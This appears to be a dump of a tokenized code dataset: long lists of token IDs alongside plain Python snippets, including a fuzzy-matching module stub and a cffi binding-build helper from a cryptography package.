7785,
62,
37266,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3108,
62,
37266,
17816,
9630,
20520,
796,
1957,
62,
7785,
62,
37266,
17816,
9630,
20520,
220,
1303,
645,
20402,
25,
412,
33548,
628,
220,
220,
220,
220,
220,
220,
220,
12405,
62,
37266,
796,
17635,
628,
220,
220,
220,
220,
220,
220,
220,
13639,
62,
37266,
796,
23884,
628,
220,
220,
220,
220,
220,
220,
220,
1296,
62,
37266,
796,
17635,
198,
220,
220,
220,
220,
220,
220,
220,
1957,
62,
7785,
62,
16624,
796,
23884,
628,
220,
220,
220,
220,
220,
220,
220,
1767,
62,
37266,
796,
6045,
198,
220,
220,
220,
220,
220,
220,
220,
611,
705,
525,
4033,
378,
62,
25927,
6,
287,
1957,
62,
7785,
62,
37266,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1767,
62,
37266,
796,
1957,
62,
7785,
62,
37266,
17816,
525,
4033,
378,
62,
25927,
20520,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
14626,
13639,
4600,
38855,
63,
198,
220,
220,
220,
220,
220,
220,
220,
13639,
62,
37266,
17816,
38855,
20520,
796,
2116,
13,
15042,
62,
16366,
13,
19738,
62,
25677,
62,
13635,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
37250,
31438,
14,
17752,
6,
12962,
220,
1303,
645,
20402,
25,
412,
33548,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
14626,
13639,
4600,
19746,
12,
6030,
63,
198,
220,
220,
220,
220,
220,
220,
220,
13639,
62,
37266,
17816,
19746,
12,
6030,
20520,
796,
2116,
13,
15042,
62,
16366,
13,
19738,
62,
25677,
62,
11299,
62,
4906,
7,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
37250,
31438,
14,
17752,
6,
12962,
220,
1303,
645,
20402,
25,
412,
33548,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
48191,
4634,
198,
220,
220,
220,
220,
220,
220,
220,
6284,
62,
33692,
796,
17635,
220,
1303,
645,
20402,
25,
412,
33548,
628,
220,
220,
220,
220,
220,
220,
220,
581,
796,
2116,
13,
15042,
62,
16366,
13,
13345,
62,
15042,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
31051,
17752,
14,
79,
80,
14,
90,
9630,
92,
14,
12947,
3256,
705,
32782,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3108,
62,
37266,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
12405,
62,
37266,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
13639,
62,
37266,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1767,
28,
2618,
62,
37266,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1281,
62,
37266,
28,
687,
62,
37266,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3696,
28,
12001,
62,
7785,
62,
16624,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2882,
62,
4906,
11639,
18243,
31077,
3256,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6284,
62,
33692,
28,
18439,
62,
33692,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
30351,
62,
42180,
28,
12001,
62,
7785,
62,
37266,
13,
1136,
10786,
292,
13361,
62,
42180,
33809,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
7783,
62,
4023,
62,
7890,
62,
8807,
28,
12001,
62,
7785,
62,
37266,
13,
1136,
10786,
62,
7783,
62,
4023,
62,
7890,
62,
8807,
33809,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
3866,
2220,
62,
11299,
28,
12001,
62,
7785,
62,
37266,
13,
1136,
10786,
62,
3866,
2220,
62,
11299,
3256,
6407,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
25927,
62,
48678,
28,
12001,
62,
7785,
62,
37266,
13,
1136,
10786,
62,
25927,
62,
48678,
33809,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4947,
62,
687,
1381,
28,
43681,
62,
687,
1381,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
25927,
62,
18439,
28,
12001,
62,
7785,
62,
37266,
13,
1136,
10786,
62,
25927,
62,
18439,
6,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
581,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
628,
220,
220,
220,
825,
2989,
7,
944,
11,
2989,
62,
25927,
11,
12429,
46265,
22046,
2599,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
5990,
23914,
257,
2989,
220,
1303,
645,
20402,
25,
412,
33548,
628,
220,
220,
220,
220,
220,
220,
220,
220,
23600,
82,
281,
2134,
351,
13677,
6608,
25,
1635,
262,
6376,
1438,
1635,
262,
2872,
12405,
2134,
17934,
1058,
220,
220,
220,
7559,
63,
220,
220,
1391,
6,
9630,
10354,
6,
76,
20526,
41707,
22766,
10354,
90,
6,
30388,
10354,
90,
6,
27238,
10354,
58,
90,
6,
22766,
62,
8841,
10354,
6,
3807,
6,
92,
60,
11709,
4032,
12048,
62,
25747,
10354,
90,
6,
1820,
31937,
10354,
90,
6,
12048,
10354,
90,
6,
45145,
10354,
6,
5064,
7,
8821,
29,
23,
11,
16,
11,
15,
33047,
42535,
4032,
30619,
10354,
58,
90,
6,
1820,
31937,
10354,
6,
20147,
6,
5512,
90,
6,
62,
26675,
10354,
6,
20147,
6,
92,
60,
4032,
13317,
10354,
7942,
92,
220,
220,
7559,
63,
220,
632,
20067,
351,
281,
2134,
351,
25,
532,
640,
286,
9706,
532,
611,
262,
12405,
28805,
503,
532,
281,
7177,
351,
7127,
357,
31409,
4963,
8,
532,
3224,
11,
611,
31582,
318,
9343,
11,
281,
7177,
351,
31582,
1321,
318,
7223,
220,
220,
220,
220,
7559,
63,
220,
220,
1391,
6,
83,
566,
10354,
940,
4032,
16514,
276,
62,
448,
10354,
9562,
4032,
71,
896,
10354,
90,
6,
23350,
10354,
17,
4032,
71,
896,
10354,
58,
90,
6,
62,
312,
10354,
6,
16,
41707,
62,
26675,
10354,
16,
4032,
62,
10459,
10354,
90,
6,
70,
312,
10354,
1157,
92,
5512,
90,
6,
62,
312,
10354,
6,
17,
41707,
62,
26675,
10354,
16,
4032,
62,
10459,
10354,
90,
6,
70,
312,
10354,
1065,
11709,
60,
11709,
220,
220,
7559,
63,
220,
1114,
517,
1321,
546,
262,
2872,
12405,
15582,
11,
3224,
5772,
8605,
326,
460,
307,
900,
284,
262,
5128,
290,
2882,
11,
3387,
2198,
25,
3740,
1378,
805,
723,
13,
76,
5109,
382,
12947,
13,
785,
14,
18243,
278,
14,
13295,
62,
5239,
62,
15699,
278,
14,
26416,
62,
26060,
2,
40717,
13,
220,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
770,
2446,
1838,
257,
18305,
516,
14626,
2581,
416,
4277,
13,
1675,
787,
281,
198,
220,
220,
220,
220,
220,
220,
220,
39354,
14626,
2581,
11,
3387,
1208,
30351,
62,
42180,
28,
17821,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
4704,
796,
40391,
13,
12947,
7,
12947,
62,
25927,
11,
30351,
62,
42180,
28,
17821,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1255,
796,
4704,
13,
1136,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
2989,
62,
25927,
25,
357,
35827,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
2989,
62,
25927,
25,
11140,
18453,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
30351,
62,
42180,
25,
10127,
284,
12260,
262,
2581,
355,
24871,
3481,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
30351,
62,
42180,
25,
20512,
11,
11902,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
4808,
3866,
2220,
62,
11299,
25,
611,
10352,
11,
262,
2956,
297,
571,
18,
13,
6535,
51,
4805,
9774,
2591,
2134,
481,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
307,
4504,
1231,
3555,
14,
12501,
7656,
2882,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
13,
15161,
318,
6407,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
4808,
3866,
2220,
62,
11299,
25,
20512,
11,
11902,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
4808,
25927,
62,
48678,
25,
26827,
4634,
329,
428,
2581,
13,
1002,
530,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1271,
2810,
11,
340,
481,
307,
2472,
2581,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
26827,
13,
632,
460,
635,
307,
257,
5166,
357,
83,
29291,
8,
286,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
357,
38659,
11,
1100,
8,
640,
5269,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
7783,
25,
16409,
262,
1255,
2134,
13,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1002,
262,
2446,
318,
1444,
355,
24871,
3481,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5860,
262,
2581,
4704,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
81,
4906,
25,
11140,
31077,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
479,
86,
22046,
17816,
62,
7783,
62,
4023,
62,
7890,
62,
8807,
20520,
796,
6407,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
13,
12947,
62,
4480,
62,
4023,
62,
10951,
7,
12947,
62,
25927,
11,
12429,
46265,
22046,
8,
220,
1303,
645,
20402,
25,
412,
33548,
628,
220,
220,
220,
825,
2989,
62,
4480,
62,
4023,
62,
10951,
7,
944,
11,
2989,
62,
25927,
11,
12429,
46265,
22046,
2599,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
5990,
23914,
257,
2989,
220,
1303,
645,
20402,
25,
412,
33548,
628,
220,
220,
220,
220,
220,
220,
220,
220,
23600,
82,
281,
2134,
351,
13677,
6608,
25,
1635,
262,
6376,
1438,
1635,
262,
2872,
12405,
2134,
17934,
1058,
220,
220,
220,
7559,
63,
220,
220,
1391,
6,
9630,
10354,
6,
76,
20526,
41707,
22766,
10354,
90,
6,
30388,
10354,
90,
6,
27238,
10354,
58,
90,
6,
22766,
62,
8841,
10354,
6,
3807,
6,
92,
60,
11709,
4032,
12048,
62,
25747,
10354,
90,
6,
1820,
31937,
10354,
90,
6,
12048,
10354,
90,
6,
45145,
10354,
6,
5064,
7,
8821,
29,
23,
11,
16,
11,
15,
33047,
42535,
4032,
30619,
10354,
58,
90,
6,
1820,
31937,
10354,
6,
20147,
6,
5512,
90,
6,
62,
26675,
10354,
6,
20147,
6,
92,
60,
4032,
13317,
10354,
7942,
92,
220,
220,
7559,
63,
220,
632,
20067,
351,
281,
2134,
351,
25,
532,
640,
286,
9706,
532,
611,
262,
12405,
28805,
503,
532,
281,
7177,
351,
7127,
357,
31409,
4963,
8,
532,
3224,
11,
611,
31582,
318,
9343,
11,
281,
7177,
351,
31582,
1321,
318,
7223,
220,
220,
220,
220,
7559,
63,
220,
220,
1391,
6,
83,
566,
10354,
940,
4032,
16514,
276,
62,
448,
10354,
9562,
4032,
71,
896,
10354,
90,
6,
23350,
10354,
17,
4032,
71,
896,
10354,
58,
90,
6,
62,
312,
10354,
6,
16,
41707,
62,
26675,
10354,
16,
4032,
62,
10459,
10354,
90,
6,
70,
312,
10354,
1157,
92,
5512,
90,
6,
62,
312,
10354,
6,
17,
41707,
62,
26675,
10354,
16,
4032,
62,
10459,
10354,
90,
6,
70,
312,
10354,
1065,
11709,
60,
11709,
220,
220,
7559,
63,
220,
1114,
517,
1321,
546,
262,
2872,
12405,
15582,
11,
3224,
5772,
8605,
326,
460,
307,
900,
284,
262,
5128,
290,
2882,
11,
3387,
2198,
25,
3740,
1378,
805,
723,
13,
76,
5109,
382,
12947,
13,
785,
14,
18243,
278,
14,
13295,
62,
5239,
62,
15699,
278,
14,
26416,
62,
26060,
2,
40717,
13,
220,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
770,
2446,
1838,
257,
18305,
516,
14626,
2581,
416,
4277,
13,
1675,
787,
281,
198,
220,
220,
220,
220,
220,
220,
220,
39354,
14626,
2581,
11,
3387,
1208,
30351,
62,
42180,
28,
17821,
628,
220,
220,
220,
220,
220,
220,
220,
13163,
4704,
796,
40391,
13,
12947,
62,
4480,
62,
4023,
62,
10951,
7,
12947,
62,
25927,
11,
30351,
62,
42180,
28,
17821,
8,
198,
220,
220,
220,
220,
220,
220,
220,
13163,
1255,
796,
4704,
13,
1136,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
2989,
62,
25927,
25,
357,
35827,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
2989,
62,
25927,
25,
11140,
18453,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
30351,
62,
42180,
25,
10127,
284,
12260,
262,
2581,
355,
24871,
3481,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
30351,
62,
42180,
25,
20512,
11,
11902,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
4808,
7783,
62,
4023,
62,
7890,
62,
8807,
25,
2882,
1366,
1231,
1182,
3722,
2438,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
290,
24697,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
4808,
7783,
62,
4023,
62,
7890,
62,
8807,
25,
20512,
11,
11902,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
4808,
3866,
2220,
62,
11299,
25,
611,
10352,
11,
262,
2956,
297,
571,
18,
13,
6535,
51,
4805,
9774,
2591,
2134,
481,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
307,
4504,
1231,
3555,
14,
12501,
7656,
2882,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
13,
15161,
318,
6407,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
4808,
3866,
2220,
62,
11299,
25,
20512,
11,
11902,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
4808,
25927,
62,
48678,
25,
26827,
4634,
329,
428,
2581,
13,
1002,
530,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1271,
2810,
11,
340,
481,
307,
2472,
2581,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
26827,
13,
632,
460,
635,
307,
257,
5166,
357,
83,
29291,
8,
286,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
357,
38659,
11,
1100,
8,
640,
5269,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
17143,
4808,
25927,
62,
18439,
25,
900,
284,
20957,
262,
6284,
62,
33692,
329,
281,
257,
2060,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2581,
26,
428,
6840,
24245,
262,
18239,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
287,
262,
1020,
329,
257,
2060,
2581,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
4906,
4808,
25927,
62,
18439,
25,
8633,
11,
11902,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
7783,
25,
16409,
262,
1255,
2134,
13,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1002,
262,
2446,
318,
1444,
355,
24871,
3481,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5860,
262,
2581,
4704,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1058,
81,
4906,
25,
46545,
7,
18243,
31077,
11,
3722,
62,
8189,
7,
600,
828,
24697,
7,
40717,
39681,
35,
713,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
1957,
62,
7785,
62,
37266,
796,
17205,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
477,
62,
37266,
796,
685,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
12947,
62,
25927,
6,
198,
220,
220,
220,
220,
220,
220,
220,
2361,
198,
220,
220,
220,
220,
220,
220,
220,
477,
62,
37266,
13,
2302,
437,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
685,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
292,
13361,
62,
42180,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
62,
7783,
62,
4023,
62,
7890,
62,
8807,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
62,
3866,
2220,
62,
11299,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
62,
25927,
62,
48678,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
62,
25927,
62,
18439,
6,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2361,
198,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
220,
220,
220,
220,
329,
1994,
11,
1188,
287,
2237,
13,
2676,
23814,
7,
12001,
62,
7785,
62,
37266,
17816,
46265,
22046,
20520,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
1994,
407,
287,
477,
62,
37266,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5298,
5949,
72,
6030,
12331,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
30074,
281,
10059,
21179,
4578,
705,
4,
82,
29653,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
284,
2446,
2989,
1,
4064,
1994,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1957,
62,
7785,
62,
37266,
58,
2539,
60,
796,
1188,
198,
220,
220,
220,
220,
220,
220,
220,
1619,
1957,
62,
7785,
62,
37266,
17816,
46265,
22046,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
11767,
262,
2672,
11507,
705,
12947,
62,
25927,
6,
318,
900,
198,
220,
220,
220,
220,
220,
220,
220,
611,
2116,
13,
15042,
62,
16366,
13,
16366,
62,
1589,
62,
12102,
341,
290,
19203,
12947,
62,
25927,
6,
407,
287,
1957,
62,
7785,
62,
37266,
393,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1957,
62,
7785,
62,
37266,
17816,
12947,
62,
25927,
20520,
318,
6045,
2599,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5298,
5949,
72,
11395,
12331,
7203,
43730,
262,
2672,
11507,
4600,
12947,
62,
25927,
63,
618,
4585,
4600,
12947,
63,
4943,
220,
1303,
645,
20402,
25,
412,
33548,
628,
220,
220,
220,
220,
220,
220,
220,
4947,
62,
687,
1381,
796,
23884,
628,
220,
220,
220,
220,
220,
220,
220,
3108,
62,
37266,
796,
23884,
628,
220,
220,
220,
220,
220,
220,
220,
12405,
62,
37266,
796,
17635,
628,
220,
220,
220,
220,
220,
220,
220,
13639,
62,
37266,
796,
23884,
628,
220,
220,
220,
220,
220,
220,
220,
1296,
62,
37266,
796,
17635,
198,
220,
220,
220,
220,
220,
220,
220,
1957,
62,
7785,
62,
16624,
796,
23884,
628,
220,
220,
220,
220,
220,
220,
220,
1767,
62,
37266,
796,
6045,
198,
220,
220,
220,
220,
220,
220,
220,
611,
705,
12947,
62,
25927,
6,
287,
1957,
62,
7785,
62,
37266,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1767,
62,
37266,
796,
1957,
62,
7785,
62,
37266,
17816,
12947,
62,
25927,
20520,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
14626,
13639,
4600,
38855,
63,
198,
220,
220,
220,
220,
220,
220,
220,
13639,
62,
37266,
17816,
38855,
20520,
796,
2116,
13,
15042,
62,
16366,
13,
19738,
62,
25677,
62,
13635,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
37250,
31438,
14,
17752,
6,
12962,
220,
1303,
645,
20402,
25,
412,
33548,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
14626,
13639,
4600,
19746,
12,
6030,
63,
198,
220,
220,
220,
220,
220,
220,
220,
13639,
62,
37266,
17816,
19746,
12,
6030,
20520,
796,
2116,
13,
15042,
62,
16366,
13,
19738,
62,
25677,
62,
11299,
62,
4906,
7,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
37250,
31438,
14,
17752,
6,
12962,
220,
1303,
645,
20402,
25,
412,
33548,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
48191,
4634,
198,
220,
220,
220,
220,
220,
220,
220,
6284,
62,
33692,
796,
17635,
220,
1303,
645,
20402,
25,
412,
33548,
628,
220,
220,
220,
220,
220,
220,
220,
581,
796,
2116,
13,
15042,
62,
16366,
13,
13345,
62,
15042,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
31051,
17752,
14,
12947,
3256,
705,
32782,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3108,
62,
37266,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
12405,
62,
37266,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
13639,
62,
37266,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1767,
28,
2618,
62,
37266,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1281,
62,
37266,
28,
687,
62,
37266,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3696,
28,
12001,
62,
7785,
62,
16624,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2882,
62,
4906,
11639,
18243,
31077,
3256,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6284,
62,
33692,
28,
18439,
62,
33692,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
30351,
62,
42180,
28,
12001,
62,
7785,
62,
37266,
13,
1136,
10786,
292,
13361,
62,
42180,
33809,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
7783,
62,
4023,
62,
7890,
62,
8807,
28,
12001,
62,
7785,
62,
37266,
13,
1136,
10786,
62,
7783,
62,
4023,
62,
7890,
62,
8807,
33809,
220,
1303,
645,
20402,
25,
412,
33548,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
3866,
2220,
62,
11299,
28,
12001,
62,
7785,
62,
37266,
13,
1136,
10786,
62,
3866,
2220,
62,
11299,
3256,
6407,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
25927,
62,
48678,
28,
12001,
62,
7785,
62,
37266,
13,
1136,
10786,
62,
25927,
62,
48678,
33809,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4947,
62,
687,
1381,
28,
43681,
62,
687,
1381,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
25927,
62,
18439,
28,
12001,
62,
7785,
62,
37266,
13,
1136,
10786,
62,
25927,
62,
18439,
6,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
581,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
198
] | 2.269055 | 7,203 |
import logging
from typing import AnyStr, Callable, Iterable, List, Optional, Tuple
LOGGER = logging.getLogger(__name__)
T_IsJunkFunction = Callable[[AnyStr, int], bool]
EMPTY_MATCHING_BLOCKS = MatchingBlocks([])
| [
11748,
18931,
198,
198,
6738,
19720,
1330,
4377,
13290,
11,
4889,
540,
11,
40806,
540,
11,
7343,
11,
32233,
11,
309,
29291,
628,
198,
25294,
30373,
796,
18931,
13,
1136,
11187,
1362,
7,
834,
3672,
834,
8,
628,
198,
51,
62,
3792,
41,
2954,
22203,
796,
4889,
540,
30109,
7149,
13290,
11,
493,
4357,
20512,
60,
628,
628,
198,
198,
39494,
9936,
62,
44,
11417,
2751,
62,
9148,
11290,
50,
796,
13225,
278,
45356,
26933,
12962,
628,
628,
628,
198
] | 2.8625 | 80 |
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import sys
from distutils.ccompiler import new_compiler
from distutils.dist import Distribution
from cffi import FFI
def build_ffi_for_binding(module_name, module_prefix, modules, libraries=[],
extra_compile_args=[], extra_link_args=[]):
"""
Modules listed in ``modules`` should have the following attributes:
* ``INCLUDES``: A string containing C includes.
* ``TYPES``: A string containing C declarations for types.
* ``FUNCTIONS``: A string containing C declarations for functions.
* ``MACROS``: A string containing C declarations for any macros.
* ``CUSTOMIZATIONS``: A string containing arbitrary top-level C code, this
can be used to do things like test for a define and provide an
alternate implementation based on that.
"""
types = []
includes = []
functions = []
macros = []
customizations = []
for name in modules:
__import__(module_prefix + name)
module = sys.modules[module_prefix + name]
types.append(module.TYPES)
macros.append(module.MACROS)
functions.append(module.FUNCTIONS)
includes.append(module.INCLUDES)
customizations.append(module.CUSTOMIZATIONS)
# We include functions here so that if we got any of their definitions
# wrong, the underlying C compiler will explode. In C you are allowed
# to re-declare a function if it has the same signature. That is:
# int foo(int);
# int foo(int);
# is legal, but the following will fail to compile:
# int foo(int);
# int foo(short);
#
# XXX <arigo> No, it is a bad idea. OpenSSL itself tends to tweak
# the definitions, like adding a 'const' (see issue #2575). Every
# time they do so, it makes a gratuitous break in this code. It is
# better to rely on the C compiler for that, which is a little bit
# more flexible. That's the point of set_source(). We can still
# re-enable the line ``#functions +`` below to get the original
# behavior. (I would enable it during tests, but I don't find any
# custom test at all..??)
#
verify_source = "\n".join(
includes +
#functions +
customizations
)
ffi = build_ffi(
module_name,
cdef_source="\n".join(types + functions + macros),
verify_source=verify_source,
libraries=libraries,
extra_compile_args=extra_compile_args,
extra_link_args=extra_link_args,
)
return ffi
def compiler_type():
"""
Gets the compiler type from distutils. On Windows with MSVC it will be
"msvc". On OS X and linux it is "unix".
"""
dist = Distribution()
dist.parse_config_files()
cmd = dist.get_command_obj('build')
cmd.ensure_finalized()
compiler = new_compiler(compiler=cmd.compiler)
return compiler.compiler_type
| [
2,
770,
2393,
318,
